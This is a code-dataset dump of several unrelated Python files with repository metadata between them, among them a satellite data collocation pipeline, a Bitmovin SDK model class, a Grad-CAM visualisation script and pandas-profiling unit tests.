os.system(f'tar -xf {os.path.join(full_dir, "HS_H08_"+h8_dir+"_FLDK.tar")}')
os.system(f'rm {os.path.join(full_dir, "HS_H08_"+h8_dir+"_FLDK.tar")}')
os.system(f'bunzip2 {full_dir}/*.bz2')
def full_collocation(fname, target_dir):
caliop_filename = fname.split('/')[-1]
if 'CAL' not in caliop_filename:
raise Exception('Filename is not an acceptable format')
if caliop_filename[-4:] != '.hdf':
caliop_filename = caliop_filename + '.hdf'
if 'V4-21' in caliop_filename:
caliop_filename = caliop_filename.replace('V4-21', 'V4-20')
fname = fname.replace('V4-21', 'V4-20')
print(caliop_filename)
log_w_message(f'Initiating collocation for {caliop_filename}')
staging_dir, archive_dir, proc_data_dir = build_temp_folders(fname, target_dir)
os.chdir(staging_dir)
log_w_message(f'Getting CALIOP file: {caliop_filename}')
os.system(f'qsub -W block=True -v "FNAME={fname},TARGET_DIR={proc_data_dir}" -o {os.path.join(archive_dir, "get_caliop_output.txt")} -e {os.path.join(archive_dir, "get_caliop_error.txt")} /g/data/k10/dr1709/code/Personal/Collocation/v2/data_grabbers/caliop_data_grabber.qsub')
if not os.path.exists(os.path.join(proc_data_dir, caliop_filename)):
raise Exception('CALIOP file %s cannot be retrieved' % caliop_filename)
log_w_message('CALIOP file retrieved')
log_w_message(f'Finding Himawari-8 scenes that collocate with {caliop_filename}')
sys.path.append('/g/data/k10/dr1709/code/Personal/Collocation/v2/collocators')
from rough_collocator import main as rc_main
rc_main(os.path.join(proc_data_dir, fname), staging_dir)
log_w_message('Collocated Himawari-8 scenes found')
log_w_message('Getting collocated Himawari-8 folders from mdss')
os.system(f'qsub -W block=True -v "FNAME={fname},TARGET_DIR={staging_dir}" -o {os.path.join(archive_dir, "get_himawari_output.txt")} -e {os.path.join(archive_dir, "get_himawari_error.txt")} /g/data/k10/dr1709/code/Personal/Collocation/v2/data_grabbers/himawari_data_grabber.qsub')
log_w_message('All collocated Himawari-8 folders retrieved')
log_w_message('Decompressing compressed Himawari-8 data')
decompress_h8_data(proc_data_dir)
log_w_message('Decompression complete')
log_w_message('Carrying out collocation of Himawari-8 and CALIOP data')
os.system(f'qsub -W block=True -v "FNAME={fname},TARGET_DIR={staging_dir}" -o {os.path.join(archive_dir, "parallel_collocation_output.txt")} -e {os.path.join(archive_dir, "parallel_collocation_error.txt")} /g/data/k10/dr1709/code/Personal/Collocation/v2/collocators/parallel_collocator.qsub')
log_w_message(f'Collocated data stored in {staging_dir}')
log_w_message('Cleaning out Himawari-8 and CALIOP data')
os.system(f'rm -r {proc_data_dir}')
def main(list_of_files, target_dir):
log_w_message('Reading in filenames')
header, fnames = read_list(list_of_files)
log_w_message(f'Running for {len(fnames)} files')
#num_failures = 0
for n, fname in enumerate(fnames):
try:
full_collocation(fname=fname, target_dir=target_dir)
fnames[n] = '# ' + fname
with open(list_of_files,'w') as f:
f.writelines([head_line + '\n' for head_line in header] + [lst_fname + '\n' for lst_fname in fnames])
except Exception as e:
log_w_message(f'{fname} collocation failed')
traceback.print_exc()
#if num_failures < 2:
# num_failures += 1
#else:
# break
staging_dir_name = fname.split('/')[-1][:-4]
os.system(f'rm -r {os.path.join(target_dir, staging_dir_name)}')
pass
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
"-l",
"--list_of_files",
nargs="?",
type=str,
help="name of .txt file listing all the files to be downloaded"
)
parser.add_argument(
"-f",
"--filename",
nargs="?",
type=str,
help="name of file to be downloaded"
)
parser.add_argument(
"-d",
"--target_directory",
nargs="?",
default=os.getcwd(),
type=str,
help="full path to the directory where the files will be stored"
)
args = parser.parse_args()
if args.list_of_files is not None:
main(args.list_of_files, args.target_directory)
elif args.filename is not None:
full_collocation(args.filename, args.target_directory)
else:
raise Exception('Need to provide a filename or a text file containing a list of filenames')
| 4,860 | 0 | 142 |
4c2fb08ef1f0a5f702a10eed2b5a89ceea0f9097 | 7,534 | py | Python | bitmovin_api_sdk/models/audio_mix_input_stream_channel.py | jaythecaesarean/bitmovin-api-sdk-python | 48166511fcb9082041c552ace55a9b66cc59b794 | [
"MIT"
] | 11 | 2019-07-03T10:41:16.000Z | 2022-02-25T21:48:06.000Z | bitmovin_api_sdk/models/audio_mix_input_stream_channel.py | jaythecaesarean/bitmovin-api-sdk-python | 48166511fcb9082041c552ace55a9b66cc59b794 | [
"MIT"
] | 8 | 2019-11-23T00:01:25.000Z | 2021-04-29T12:30:31.000Z | bitmovin_api_sdk/models/audio_mix_input_stream_channel.py | jaythecaesarean/bitmovin-api-sdk-python | 48166511fcb9082041c552ace55a9b66cc59b794 | [
"MIT"
] | 13 | 2020-01-02T14:58:18.000Z | 2022-03-26T12:10:30.000Z | # coding: utf-8
from enum import Enum
from six import string_types, iteritems
from bitmovin_api_sdk.common.poscheck import poscheck_model
from bitmovin_api_sdk.models.audio_mix_channel_type import AudioMixChannelType
import pprint
import six
| 35.706161 | 164 | 0.655296 | # coding: utf-8
from enum import Enum
from six import string_types, iteritems
from bitmovin_api_sdk.common.poscheck import poscheck_model
from bitmovin_api_sdk.models.audio_mix_channel_type import AudioMixChannelType
import pprint
import six
class AudioMixInputStreamChannel(object):
@poscheck_model
def __init__(self,
input_stream_id=None,
output_channel_type=None,
output_channel_number=None,
source_channels=None):
# type: (string_types, AudioMixChannelType, int, list[AudioMixInputStreamSourceChannel]) -> None
self._input_stream_id = None
self._output_channel_type = None
self._output_channel_number = None
self._source_channels = list()
self.discriminator = None
if input_stream_id is not None:
self.input_stream_id = input_stream_id
if output_channel_type is not None:
self.output_channel_type = output_channel_type
if output_channel_number is not None:
self.output_channel_number = output_channel_number
if source_channels is not None:
self.source_channels = source_channels
@property
def openapi_types(self):
types = {
'input_stream_id': 'string_types',
'output_channel_type': 'AudioMixChannelType',
'output_channel_number': 'int',
'source_channels': 'list[AudioMixInputStreamSourceChannel]'
}
return types
@property
def attribute_map(self):
attributes = {
'input_stream_id': 'inputStreamId',
'output_channel_type': 'outputChannelType',
'output_channel_number': 'outputChannelNumber',
'source_channels': 'sourceChannels'
}
return attributes
@property
def input_stream_id(self):
# type: () -> string_types
"""Gets the input_stream_id of this AudioMixInputStreamChannel.
The id of the input stream that should be used for mixing.
:return: The input_stream_id of this AudioMixInputStreamChannel.
:rtype: string_types
"""
return self._input_stream_id
@input_stream_id.setter
def input_stream_id(self, input_stream_id):
# type: (string_types) -> None
"""Sets the input_stream_id of this AudioMixInputStreamChannel.
The id of the input stream that should be used for mixing.
:param input_stream_id: The input_stream_id of this AudioMixInputStreamChannel.
:type: string_types
"""
if input_stream_id is not None:
if not isinstance(input_stream_id, string_types):
raise TypeError("Invalid type for `input_stream_id`, type has to be `string_types`")
self._input_stream_id = input_stream_id
@property
def output_channel_type(self):
# type: () -> AudioMixChannelType
"""Gets the output_channel_type of this AudioMixInputStreamChannel.
:return: The output_channel_type of this AudioMixInputStreamChannel.
:rtype: AudioMixChannelType
"""
return self._output_channel_type
@output_channel_type.setter
def output_channel_type(self, output_channel_type):
# type: (AudioMixChannelType) -> None
"""Sets the output_channel_type of this AudioMixInputStreamChannel.
:param output_channel_type: The output_channel_type of this AudioMixInputStreamChannel.
:type: AudioMixChannelType
"""
if output_channel_type is not None:
if not isinstance(output_channel_type, AudioMixChannelType):
raise TypeError("Invalid type for `output_channel_type`, type has to be `AudioMixChannelType`")
self._output_channel_type = output_channel_type
@property
def output_channel_number(self):
# type: () -> int
"""Gets the output_channel_number of this AudioMixInputStreamChannel.
Number of this output channel. If type is 'CHANNEL_NUMBER', this must be set.
:return: The output_channel_number of this AudioMixInputStreamChannel.
:rtype: int
"""
return self._output_channel_number
@output_channel_number.setter
def output_channel_number(self, output_channel_number):
# type: (int) -> None
"""Sets the output_channel_number of this AudioMixInputStreamChannel.
Number of this output channel. If type is 'CHANNEL_NUMBER', this must be set.
:param output_channel_number: The output_channel_number of this AudioMixInputStreamChannel.
:type: int
"""
if output_channel_number is not None:
if not isinstance(output_channel_number, int):
raise TypeError("Invalid type for `output_channel_number`, type has to be `int`")
self._output_channel_number = output_channel_number
@property
def source_channels(self):
# type: () -> list[AudioMixInputStreamSourceChannel]
"""Gets the source_channels of this AudioMixInputStreamChannel.
List of source channels to be mixed
:return: The source_channels of this AudioMixInputStreamChannel.
:rtype: list[AudioMixInputStreamSourceChannel]
"""
return self._source_channels
@source_channels.setter
def source_channels(self, source_channels):
# type: (list) -> None
"""Sets the source_channels of this AudioMixInputStreamChannel.
List of source channels to be mixed
:param source_channels: The source_channels of this AudioMixInputStreamChannel.
:type: list[AudioMixInputStreamSourceChannel]
"""
if source_channels is not None:
if not isinstance(source_channels, list):
raise TypeError("Invalid type for `source_channels`, type has to be `list[AudioMixInputStreamSourceChannel]`")
self._source_channels = source_channels
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if value is None:
continue
if isinstance(value, list):
if len(value) == 0:
continue
result[self.attribute_map.get(attr)] = [y.value if isinstance(y, Enum) else y for y in [x.to_dict() if hasattr(x, "to_dict") else x for x in value]]
elif hasattr(value, "to_dict"):
result[self.attribute_map.get(attr)] = value.to_dict()
elif isinstance(value, Enum):
result[self.attribute_map.get(attr)] = value.value
elif isinstance(value, dict):
result[self.attribute_map.get(attr)] = {k: (v.to_dict() if hasattr(v, "to_dict") else v) for (k, v) in value.items()}
else:
result[self.attribute_map.get(attr)] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AudioMixInputStreamChannel):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 1,407 | 5,860 | 23 |
5ddcb4984ecded396bfad62244969faef3d13010 | 1,342 | py | Python | integrationtest/vm/virtualrouter/suite_teardown.py | sherry546/zstack-woodpecker | 54a37459f2d72ce6820974feaa6eb55772c3d2ce | [
"Apache-2.0"
] | 1 | 2021-03-21T12:41:11.000Z | 2021-03-21T12:41:11.000Z | integrationtest/vm/virtualrouter/suite_teardown.py | sherry546/zstack-woodpecker | 54a37459f2d72ce6820974feaa6eb55772c3d2ce | [
"Apache-2.0"
] | null | null | null | integrationtest/vm/virtualrouter/suite_teardown.py | sherry546/zstack-woodpecker | 54a37459f2d72ce6820974feaa6eb55772c3d2ce | [
"Apache-2.0"
] | 1 | 2017-05-19T06:40:40.000Z | 2017-05-19T06:40:40.000Z | '''
Integration Test Teardown case
@author: Youyk
'''
import zstacklib.utils.linux as linux
import zstacklib.utils.http as http
import zstackwoodpecker.setup_actions as setup_actions
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.clean_util as clean_util
import zstackwoodpecker.test_lib as test_lib
import zstacktestagent.plugins.host as host_plugin
import zstacktestagent.testagent as testagent
| 33.55 | 116 | 0.777198 | '''
Integration Test Teardown case
@author: Youyk
'''
import zstacklib.utils.linux as linux
import zstacklib.utils.http as http
import zstackwoodpecker.setup_actions as setup_actions
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.clean_util as clean_util
import zstackwoodpecker.test_lib as test_lib
import zstacktestagent.plugins.host as host_plugin
import zstacktestagent.testagent as testagent
def test():
clean_util.cleanup_all_vms_violently()
clean_util.cleanup_none_vm_volumes_violently()
clean_util.umount_all_primary_storages_violently()
clean_util.cleanup_backup_storage()
#linux.remove_vlan_eth("eth0", 10)
#linux.remove_vlan_eth("eth0", 11)
cmd = host_plugin.DeleteVlanDeviceCmd()
cmd.vlan_ethname = 'eth0.10'
hosts = test_lib.lib_get_all_hosts_from_plan()
if type(hosts) != type([]):
hosts = [hosts]
for host in hosts:
http.json_dump_post(testagent.build_http_path(host.managementIp_, host_plugin.DELETE_VLAN_DEVICE_PATH), cmd)
cmd.vlan_ethname = 'eth0.11'
for host in hosts:
http.json_dump_post(testagent.build_http_path(host.managementIp_, host_plugin.DELETE_VLAN_DEVICE_PATH), cmd)
test_lib.setup_plan.stop_node()
test_lib.lib_cleanup_host_ip_dict()
test_util.test_pass('VirtualRouter Teardown Success')
| 895 | 0 | 23 |
488a4bfce3b9103661a834646b1fcb2c2647966c | 921 | py | Python | setup.py | rhysjaques/ringdown | eca49a2d0da37e4d95e5b2dfa5a454c534e73ebe | [
"MIT"
] | 2 | 2020-11-12T01:51:08.000Z | 2021-08-23T11:47:39.000Z | setup.py | rhysjaques/ringdown | eca49a2d0da37e4d95e5b2dfa5a454c534e73ebe | [
"MIT"
] | null | null | null | setup.py | rhysjaques/ringdown | eca49a2d0da37e4d95e5b2dfa5a454c534e73ebe | [
"MIT"
] | 1 | 2021-01-13T14:35:20.000Z | 2021-01-13T14:35:20.000Z | from setuptools import setup
import os
import re
VERSION_REGEX = re.compile("__version__ = \"(.*?)\"")
CONTENTS = readfile(
os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"ringdown",
"__init__.py"
)
)
VERSION = VERSION_REGEX.findall(CONTENTS)[0]
setup(
name="ringdown",
author="Matthew Pitkin",
author_email="matthew.pitkin@ligo.org",
url="https://github.com/mattpitkin/ringdown",
version=VERSION,
packages=["ringdown"],
install_requires=readfile(
os.path.join(os.path.dirname(__file__), "requirements.txt")
),
license="MIT",
classifiers=[
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
) | 24.236842 | 67 | 0.62975 | from setuptools import setup
import os
import re
def readfile(filename):
with open(filename, encoding="utf-8") as fp:
filecontents = fp.read()
return filecontents
VERSION_REGEX = re.compile("__version__ = \"(.*?)\"")
CONTENTS = readfile(
os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"ringdown",
"__init__.py"
)
)
VERSION = VERSION_REGEX.findall(CONTENTS)[0]
setup(
name="ringdown",
author="Matthew Pitkin",
author_email="matthew.pitkin@ligo.org",
url="https://github.com/mattpitkin/ringdown",
version=VERSION,
packages=["ringdown"],
install_requires=readfile(
os.path.join(os.path.dirname(__file__), "requirements.txt")
),
license="MIT",
classifiers=[
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
) | 108 | 0 | 23 |
bf2391ee72be3d88acb4bb10c7ed3d06f2f32f68 | 6,756 | py | Python | gradcam.py | Fuchai/pytorch-grad-cam | 0f5f5ff35c029cb3cdc6496fe9e1dfee8a0dc9f5 | [
"MIT"
] | null | null | null | gradcam.py | Fuchai/pytorch-grad-cam | 0f5f5ff35c029cb3cdc6496fe9e1dfee8a0dc9f5 | [
"MIT"
] | null | null | null | gradcam.py | Fuchai/pytorch-grad-cam | 0f5f5ff35c029cb3cdc6496fe9e1dfee8a0dc9f5 | [
"MIT"
] | null | null | null | import argparse
import cv2
import numpy as np
import torch
from torch.autograd import Function
from torchvision import models, transforms
def deprocess_image(img):
""" see https://github.com/jacobgil/keras-grad-cam/blob/master/grad-cam.py#L65 """
img = img - np.mean(img)
img = img / (np.std(img) + 1e-5)
img = img * 0.1
img = img + 0.5
img = np.clip(img, 0, 1)
return np.uint8(img * 255)
if __name__ == '__main__':
""" python grad_cam.py <path_to_image>
1. Loads an image with opencv.
2. Preprocesses it for ResNet50 and converts to a pytorch variable.
3. Makes a forward pass to find the category index with the highest score,
and computes intermediate activations.
Makes the visualization. """
args = get_args()
model = models.resnet50(pretrained=True).to(args.device)
grad_cam = GradCam(model=model, feature_module=model.layer4)
img = cv2.imread(args.image_path, 1)
img = np.float32(img) / 255
# Opencv loads as BGR:
img = img[:, :, ::-1]
input_img = preprocess_image(img).to(args.device)
# If None, returns the map for the highest scoring category.
# Otherwise, targets the requested category.
target_category = None
grayscale_cam = grad_cam(input_img, target_category)
grayscale_cam = cv2.resize(grayscale_cam, (img.shape[1], img.shape[0]))
cam = show_cam_on_image(img, grayscale_cam)
gb_model = GuidedBackpropReLUModel(model=model)
gb = gb_model(input_img, target_category=target_category)
gb = gb.transpose((1, 2, 0))
cam_mask = cv2.merge([grayscale_cam, grayscale_cam, grayscale_cam])
cam_gb = deprocess_image(cam_mask * gb)
gb = deprocess_image(gb)
cv2.imwrite("grad_cam.jpg", cam)
cv2.imwrite('gb.jpg', gb)
cv2.imwrite('grad_cam_gb.jpg', cam_gb)
| 32.018957 | 86 | 0.657786 | import argparse
import cv2
import numpy as np
import torch
from torch.autograd import Function
from torchvision import models, transforms
class ModelWrapper:
def __init__(self, model, feature_module):
self.model = model
self.feature_module = feature_module
self.feature_gradients = None
self.feature_output = None
self.register_hooks()
def register_hooks(self):
target_layer = next(reversed(self.feature_module._modules))
target_layer = self.feature_module._modules[target_layer]
target_layer.register_backward_hook(self.save_gradient)
target_layer.register_forward_hook(self.save_output)
def save_gradient(self, module, grad_input, grad_output):
self.feature_gradients = grad_input[0]
def save_output(self, module, input, output):
self.feature_output = output
def __call__(self, x):
self.feature_gradients = None
self.feature_output = None
return self.model(x)
def preprocess_image(img):
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
preprocessing = transforms.Compose([
transforms.ToTensor(),
normalize,
])
return preprocessing(img.copy()).unsqueeze(0)
def show_cam_on_image(img, mask):
heatmap = cv2.applyColorMap(np.uint8(255 * mask), cv2.COLORMAP_JET)
heatmap = np.float32(heatmap) / 255
cam = heatmap + np.float32(img)
cam = cam / np.max(cam)
return np.uint8(255 * cam)
class GradCam:
def __init__(self, model, feature_module):
self.model = model
self.feature_module = feature_module
self.model.eval()
self.model_wrapper = ModelWrapper(self.model, self.feature_module)
def forward(self, input_img):
return self.model(input_img)
def __call__(self, input_img, target_category=None):
output = self.model_wrapper(input_img)
if target_category is None:
target_category = np.argmax(output.cpu().data.numpy())
one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
one_hot[0][target_category] = 1
one_hot = torch.from_numpy(one_hot).requires_grad_(True)
one_hot = one_hot.to(input_img.device)
one_hot = torch.sum(one_hot * output)
self.feature_module.zero_grad()
self.model.zero_grad()
one_hot.backward(retain_graph=True)
grads_val = self.model_wrapper.feature_gradients.cpu().data.numpy()
features = self.model_wrapper.feature_output
features = features[-1].cpu().data.numpy()
global_average_pooled_gradients = np.mean(grads_val, axis=(2, 3))[0, :]
cam = np.expand_dims(global_average_pooled_gradients, axis=(1, 2)) * features
cam = cam.sum(axis=0)
cam = np.maximum(cam, 0)
cam = cv2.resize(cam, input_img.shape[2:])
cam = cam - np.min(cam)
cam = cam / np.max(cam)
return cam
class GuidedBackpropReLU(Function):
@staticmethod
def forward(self, input_img):
positive_mask = (input_img > 0).type_as(input_img)
output = input_img * positive_mask
self.save_for_backward(positive_mask)
return output
@staticmethod
def backward(self, grad_output):
positive_mask_1 = self.saved_tensors[0]
positive_mask_2 = (grad_output > 0).type_as(grad_output)
grad_input = grad_output * positive_mask_1 * positive_mask_2
return grad_input
class GuidedBackpropReLUModel:
def __init__(self, model):
self.model = model
self.model.eval()
self.recursive_relu_apply(self.model)
def recursive_relu_apply(self, module_top):
# replace ReLU with GuidedBackpropReLU
for idx, module in module_top._modules.items():
self.recursive_relu_apply(module)
if module.__class__.__name__ == 'ReLU':
module_top._modules[idx] = GuidedBackpropReLU.apply
def __call__(self, input_img, target_category=None):
input_img.requires_grad = True
input_img.retain_grad()
output = self.model(input_img)
if target_category is None:
target_category = np.argmax(output.cpu().data.numpy())
one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
one_hot[0][target_category] = 1
one_hot = torch.from_numpy(one_hot).requires_grad_(True)
one_hot = one_hot.to(input_img.device)
one_hot = torch.sum(one_hot * output)
one_hot.backward()
output = input_img.grad.cpu().data.numpy()
output = output[0, :, :, :]
return output
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--device', type=str, default="cuda:0",
help='Use NVIDIA GPU acceleration')
parser.add_argument('--image-path', type=str, default='./examples/both.png',
help='Input image path')
args = parser.parse_args()
print(f"Device {args.device}")
return args
def deprocess_image(img):
""" see https://github.com/jacobgil/keras-grad-cam/blob/master/grad-cam.py#L65 """
img = img - np.mean(img)
img = img / (np.std(img) + 1e-5)
img = img * 0.1
img = img + 0.5
img = np.clip(img, 0, 1)
return np.uint8(img * 255)
if __name__ == '__main__':
""" python grad_cam.py <path_to_image>
1. Loads an image with opencv.
2. Preprocesses it for ResNet50 and converts to a pytorch variable.
3. Makes a forward pass to find the category index with the highest score,
and computes intermediate activations.
Makes the visualization. """
args = get_args()
model = models.resnet50(pretrained=True).to(args.device)
grad_cam = GradCam(model=model, feature_module=model.layer4)
img = cv2.imread(args.image_path, 1)
img = np.float32(img) / 255
# Opencv loads as BGR:
img = img[:, :, ::-1]
input_img = preprocess_image(img).to(args.device)
# If None, returns the map for the highest scoring category.
# Otherwise, targets the requested category.
target_category = None
grayscale_cam = grad_cam(input_img, target_category)
grayscale_cam = cv2.resize(grayscale_cam, (img.shape[1], img.shape[0]))
cam = show_cam_on_image(img, grayscale_cam)
gb_model = GuidedBackpropReLUModel(model=model)
gb = gb_model(input_img, target_category=target_category)
gb = gb.transpose((1, 2, 0))
cam_mask = cv2.merge([grayscale_cam, grayscale_cam, grayscale_cam])
cam_gb = deprocess_image(cam_mask * gb)
gb = deprocess_image(gb)
cv2.imwrite("grad_cam.jpg", cam)
cv2.imwrite('gb.jpg', gb)
cv2.imwrite('grad_cam_gb.jpg', cam_gb)
| 4,377 | 103 | 455 |
dbc09da959b036ed7a75ab06984c4b5d62ed3480 | 116 | py | Python | Python/URI PROBLEMAS/1011 - Esfera.py | guimaraesalves/material-python | d56b6b24ae35a67d394b43cb1ef4420805c7bd9b | [
"MIT"
] | null | null | null | Python/URI PROBLEMAS/1011 - Esfera.py | guimaraesalves/material-python | d56b6b24ae35a67d394b43cb1ef4420805c7bd9b | [
"MIT"
] | null | null | null | Python/URI PROBLEMAS/1011 - Esfera.py | guimaraesalves/material-python | d56b6b24ae35a67d394b43cb1ef4420805c7bd9b | [
"MIT"
] | null | null | null | raio = int(input())
pi = 3.14159
volume = float(4.0 * pi * (raio* raio * raio) / 3)
print("VOLUME = %0.3f" %volume)
| 23.2 | 50 | 0.586207 | raio = int(input())
pi = 3.14159
volume = float(4.0 * pi * (raio* raio * raio) / 3)
print("VOLUME = %0.3f" %volume)
| 0 | 0 | 0 |
53305877f3de42158e7f734b77f6b463c545f540 | 1,299 | py | Python | timsort/timsort_test.py | MercyFlesh/algorithms | d9bfe6c2506c2567632222abc878ebc5f1447aaf | [
"Apache-2.0"
] | 1 | 2021-06-13T11:45:18.000Z | 2021-06-13T11:45:18.000Z | timsort/timsort_test.py | MercyFlesh/algorithms | d9bfe6c2506c2567632222abc878ebc5f1447aaf | [
"Apache-2.0"
] | null | null | null | timsort/timsort_test.py | MercyFlesh/algorithms | d9bfe6c2506c2567632222abc878ebc5f1447aaf | [
"Apache-2.0"
] | null | null | null | import unittest
import matplotlib
import random
import time
import matplotlib.pyplot as plt
from timsort import Timsort
#test time sorting an array of n elements
#Checking the sorting of arrays in which there are less than 64 elements
#array sorting test greater than 64
if __name__ == "__main__":
unittest.main()
| 28.23913 | 94 | 0.568899 | import unittest
import matplotlib
import random
import time
import matplotlib.pyplot as plt
from timsort import Timsort
class timsortTest(unittest.TestCase):
#test time sorting an array of n elements
def test_time_froze(self):
data = []
count = 10000
for _ in range(count):
data.append(random.randint(0, 30000))
start_time = time.perf_counter()
Timsort(data)
print(f"time froze sort {count} elements: {time.perf_counter() - start_time} sec.\n")
#Checking the sorting of arrays in which there are less than 64 elements
def test_arr_less_64symb(self):
test_cases = (([8, 1, 7, 4, 0], [0, 1, 4, 7, 8]), ([], []))
for ex, tr in test_cases:
with self.subTest(n=ex):
self.assertEqual(Timsort(ex), tr)
#array sorting test greater than 64
def test_greater64(self):
data = []
for _ in range(100):
data.append(random.randint(0, 10000))
Timsort(data)
for i in range(len(data) - 1):
with self.subTest(value_1=data[i], value_2=data[i+1]):
self.assertTrue(data[i] <= data[i + 1])
if __name__ == "__main__":
unittest.main()
| 804 | 16 | 106 |
36db0b5c6de0ffb70fd5bd57eceeb1e2a475fc0e | 3,831 | py | Python | tests/unit/test_report_options.py | Anselmoo/pandas-profiling | 41ee043175eaa1c5b21fcba178110331adcad713 | [
"MIT"
] | 736 | 2016-01-14T03:36:03.000Z | 2018-01-06T00:56:33.000Z | tests/unit/test_report_options.py | Anselmoo/pandas-profiling | 41ee043175eaa1c5b21fcba178110331adcad713 | [
"MIT"
] | 72 | 2016-01-29T12:08:04.000Z | 2018-01-06T11:18:44.000Z | tests/unit/test_report_options.py | sthagen/pandas-profiling-pandas-profiling | 6fd50055126ebebf74c92c6f908f54fa7cd9c816 | [
"MIT"
] | 108 | 2016-01-14T11:48:18.000Z | 2018-01-02T13:35:10.000Z | import pandas as pd
import pytest
from pandas_profiling import ProfileReport
# Generating dummy data
dummy_bool_data = generate_cat_data_series(pd.Series({True: 82, False: 36}))
dummy_cat_data = generate_cat_data_series(
pd.Series(
{
"Amadeou_plus": 75,
"Beta_front": 50,
"Calciumus": 20,
"Dimitrius": 1,
"esperagus_anonymoliumus": 75,
"FrigaTTTBrigde_Writap": 50,
"galgarartiy": 30,
"He": 1,
"I": 10,
"JimISGODDOT": 1,
}
)
)
# Unit tests
# - Test category frequency plots general options
@pytest.mark.parametrize("data", [dummy_bool_data, dummy_cat_data], ids=["bool", "cat"])
@pytest.mark.parametrize("plot_type", ["bar", "pie"])
@pytest.mark.parametrize("data", [dummy_bool_data, dummy_cat_data], ids=["bool", "cat"])
@pytest.mark.parametrize("data", [dummy_bool_data, dummy_cat_data], ids=["bool", "cat"])
@pytest.mark.parametrize("plot_type", ["bar", "pie"])
# - Test category frequency plots color options
@pytest.mark.parametrize("plot_type", ["bar", "pie"])
# - Test exceptions
@pytest.mark.parametrize("data", [dummy_bool_data, dummy_cat_data], ids=["bool", "cat"])
| 33.902655 | 88 | 0.683895 | import pandas as pd
import pytest
from pandas_profiling import ProfileReport
# Generating dummy data
def generate_cat_data_series(categories):
dummy_data = []
for cat, i in categories.items():
dummy_data.extend([cat, ] * i) # fmt: skip
return pd.DataFrame({"dummy_cat": dummy_data})
dummy_bool_data = generate_cat_data_series(pd.Series({True: 82, False: 36}))
dummy_cat_data = generate_cat_data_series(
pd.Series(
{
"Amadeou_plus": 75,
"Beta_front": 50,
"Calciumus": 20,
"Dimitrius": 1,
"esperagus_anonymoliumus": 75,
"FrigaTTTBrigde_Writap": 50,
"galgarartiy": 30,
"He": 1,
"I": 10,
"JimISGODDOT": 1,
}
)
)
def generate_report(data):
return ProfileReport(
df=data,
progress_bar=False,
samples=None,
correlations=None,
missing_diagrams=None,
duplicates=None,
interactions=None,
)
# Unit tests
# - Test category frequency plots general options
@pytest.mark.parametrize("data", [dummy_bool_data, dummy_cat_data], ids=["bool", "cat"])
@pytest.mark.parametrize("plot_type", ["bar", "pie"])
def test_deactivated_cat_frequency_plot(data, plot_type):
profile = generate_report(data)
profile.config.plot.cat_freq.show = False
profile.config.plot.cat_freq.type = plot_type
html_report = profile.to_html()
assert "Category Frequency Plot" not in html_report
@pytest.mark.parametrize("data", [dummy_bool_data, dummy_cat_data], ids=["bool", "cat"])
def test_cat_frequency_default_barh_plot(data):
profile = generate_report(data)
html_report = profile.to_html()
assert "Category Frequency Plot" in html_report
@pytest.mark.parametrize("data", [dummy_bool_data, dummy_cat_data], ids=["bool", "cat"])
def test_cat_frequency_pie_plot(data):
profile = generate_report(data)
profile.config.plot.cat_freq.type = "pie"
html_report = profile.to_html()
assert "pie" in html_report
@pytest.mark.parametrize("plot_type", ["bar", "pie"])
def test_max_nuique_smaller_than_unique_cats(plot_type):
profile = generate_report(dummy_cat_data)
profile.config.plot.cat_freq.max_unique = 2 # smaller than the number of categories
profile.config.plot.cat_freq.type = plot_type
html_report = profile.to_html()
assert "Category Frequency Plot" not in html_report
# - Test category frequency plots color options
@pytest.mark.parametrize("plot_type", ["bar", "pie"])
def test_cat_frequency_with_custom_colors(plot_type):
test_data = generate_cat_data_series(pd.Series({"A": 10, "B": 10, "C": 10}))
custom_colors = {"gold": "#ffd700", "b": "#0000ff", "#FF796C": "#ff796c"}
profile = generate_report(test_data)
profile.config.plot.cat_freq.colors = list(custom_colors.keys())
profile.config.plot.cat_freq.type = plot_type
html_report = profile.to_html()
for c, hex_code in custom_colors.items():
assert f"fill: {hex_code}" in html_report, f"Missing color code of {c}"
def test_more_cats_than_colors():
test_data = generate_cat_data_series(
pd.Series({"A": 10, "B": 10, "C": 10, "D": 10})
)
custom_colors = {"gold": "#ffd700", "b": "#0000ff", "#FF796C": "#ff796c"}
profile = generate_report(test_data)
profile.config.plot.cat_freq.colors = list(custom_colors.keys())
html_report = profile.to_html()
assert "Category Frequency Plot" in html_report # just check that it worked
# - Test exceptions
@pytest.mark.parametrize("data", [dummy_bool_data, dummy_cat_data], ids=["bool", "cat"])
def test_exception_with_invalid_cat_freq_type(data):
profile = generate_report(data)
profile.config.plot.cat_freq.type = "box"
with pytest.raises(ValueError):
profile.to_html()
| 2,393 | 0 | 200 |
19c0dcfcf71c786d0e728ea04aa90bc833d7ee70 | 353 | py | Python | kubernetes_typed/client/models/v1_subject_access_review_status.py | nikhiljha/kubernetes-typed | 4f4b969aa400c88306f92560e56bda6d19b2a895 | [
"Apache-2.0"
] | 22 | 2020-12-10T13:06:02.000Z | 2022-02-13T21:58:15.000Z | kubernetes_typed/client/models/v1_subject_access_review_status.py | nikhiljha/kubernetes-typed | 4f4b969aa400c88306f92560e56bda6d19b2a895 | [
"Apache-2.0"
